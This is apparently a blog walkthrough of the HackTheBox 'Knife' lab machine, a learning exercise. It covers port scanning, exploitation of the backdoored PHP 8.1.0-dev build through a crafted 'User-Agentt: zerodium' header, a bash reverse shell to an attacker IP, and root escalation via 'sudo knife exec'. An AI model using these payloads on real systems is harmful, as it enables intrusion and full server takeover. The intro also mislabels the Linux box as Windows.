Open in app

Sign in

Write

Sign in

HackTheBox — Knife Walkthrough

Mainul Hasan
5 min readSep 12, 2021
Knife
Info Card

Summary

This is a write-up for a fairly easy windows machine from hackthebox.eu named knife. This box is a great first box to pwn if you are new to hackthebox. This box has a PHP developer version installed as a webserver where we get to use a backdoor to get the initial foothold, from there we can look around and escalate our privilege to root. So, let’s jump in.

Recon

We start with a map to discover the open ports, I find this below code pretty helpful when doing CTFs as it runs a full port scan pretty fast and then runs another nmap on the open ports using the default scripts and version enumeration flag. This is taken from the starting point module in hackthebox. You can find it there, or you can visit this link to my repository in order to check out the script. The script here is a bit modified to store the outputs in a nmap folder.

ports=$(nmap -p- --min-rate=1000 -T4 -oA nmap/knife_open_ports 10.10.10.242 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -oA nmap/knife 10.10.10.242

Looking at the results:

# Nmap 7.91 scan initiated Sun Sep 12 05:42:33 2021 as: nmap -sC -sV -p22,80 -oA nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.13s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 12 05:42:45 2021 -- 1 IP address (1 host up) scanned in 11.58 seconds

We can see only two ports open port 22 and port 80.

SSH

The 22 port banner leaks the OpenSSH version along with the platform, which is Ubuntu. We can check for the OpenSSH version over the web and see that the version is not vulnerable to any known vulnerabilities.

HTTP

Let’s have a look at port 80:

Port 80

We can see a static website. After looking at the source code, it doesn't leak, any kind of CMS data. It seems like it is a static page.

Adding index.html, index.php at the end of the URL:

http://10.10.10.242/index.php
http://10.10.10.242/index.html

For the outputs, we can say that the application supports PHP extension. we can now use this information while starting our gobuster.

gobuster dir -u http://10.10.10.242/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -o initial.crawl -t 20 -x php

While the gobuster is running let us check the request and response in BurpSuite:

BurpSuite Repeater

We can see that the server header leak the PHP version. Let’s search it over google and see if we can see anything interesting.

Google Search Results

Looking at the results, we can see that there is a backdoor that allows us to perform remote code execution.

There is an exploit-db exploit which we can run. We can also look at the blogs to see how it works. This blog by flast101 explains it really well. I recommend reading it to get a better understanding.

Two malicious commits were pushed to the PHP Git code repo on Sunday, March 28, and signed off under the names of PHP creator, Rasmus Lerdorf, and maintainer Nikita Popov.

In the malicious commits, the attackers published a mysterious change upstream, “fix typo” under the pretense this was a minor typographical correction.

However, taking a look at the added line 370 where zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP. This line executes PHP code from within the useragent HTTP header, if the string starts with ‘zerodium’.
Zerodium is a Washington-based security firm that specializes in buying and selling zero-day vulnerabilities for a variety of operating systems and popular desktop and Web applications, including for PHP itself.

Our gobuster scan doesn't give us much.

Initial Foothold

In order to exploit we send the request and change the User-Agent header to User-Agentt and then add our payload.

User-Agentt: zerodiumsystem(‘id’);

After we send the payload we can see that the remote code is executed, and we get the output.

RCE obtained

Let’s try to get a reverse shell. We set our netcat listener on port 9001

Listening on port 9001

Let us send the reverse shell via the payload:

User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'");
Burp Reqeust

And we get a shell back

Reverse Shell

Now, we convert out shell to a proper tty, and we can see that we are james

tty as james

Enumeration

Now, we can focus on escalating our privileges

Let’s check if james can run any command as sudo, and we can see that james can run knife as sudo

sudo -l output

Lets check gtfobins if we can find anything interesting for knife.

We can see from he blog as if we can run knife as sudo we can escalate our privileges

knife gtfobins

Let’s try that

Privilege Escalation

We run the following command,

sudo knife exec -E 'exec "/bin/sh"'

Voila!!! we are root

shell as root

Flags

# cat root.txt
93565db39d2077f07dd902....713c0
# cat /home/james/user.txt
280d22fe89a681e532be875....6c691
Trophy

Hope you like this wrtie-up.

~m1kU

Hackthebox
Boot2root
Knife
Penetration Testing
Hacking

--

--

Mainul Hasan

Written by Mainul Hasan

78 Followers

Trying to understand security

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams